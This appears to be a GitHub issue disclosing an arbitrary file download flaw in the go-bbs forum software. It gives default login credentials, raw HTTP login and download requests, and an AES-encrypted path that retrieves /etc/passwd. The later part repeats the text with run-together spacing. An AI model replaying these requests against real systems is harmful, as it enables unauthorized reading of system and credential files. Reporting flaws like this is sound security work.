Copy the configuration file: cp app.conf.example conf/app.conf
Modify the database configuration
Execute ./go-bbs --install to install the database,
Finally execute ./go-bbs to access the corresponding port
Vulnerability Description AND recurrence
View routing API routers/router.go line 196
Follow up the &home.SingleController{} Download method, this interface needs to be logged in, and a user will be added by default through the global search Customer
UserName: User
PassWord: 123456
Check out router.go, follow up &home.LoginController{}, pass username and password to login
POST /login.html HTTP/1.1
Host: 192.168.19.6:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
username=user&password=123456
Credentials obtained: beegosessionID=***
The incoming URL needs to be AesDecrypt
So you need to perform AesEncrypt on the downloaded path
GET /api/v1/download/1dClk+Blwbf5B9SEDK+l58R84WE7XKXawdq51GCypQo= HTTP/1.1
Host: 192.168.19.6:9090
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Cookie: beegosessionID=6bf662559825c07495e9e8a1e7380180
Connection: close
Use the credentials to access the downloaded API and successfully download /etc/passwd
The text was updated successfully, but these errors were encountered:
Install
git clone https://github.com/gobbscom/go-bbs.gitcd go-bbs && mkdir confcp app.conf.example conf/app.conf./go-bbs --installto install the database,./go-bbsto access the corresponding portVulnerability Description AND recurrence
View routing API

routers/router.goline 196Follow up the
&home.SingleController{}Download method, this interface needs to be logged in, and a user will be added by default through the global search CustomerCheck out

router.go, follow up&home.LoginController{}, pass username and password to loginCredentials obtained:
beegosessionID=***The incoming URL needs to be

AesDecryptSo you need to perform
AesEncrypton the downloaded pathUse the credentials to access the downloaded API and successfully download
/etc/passwdThe text was updated successfully, but these errors were encountered: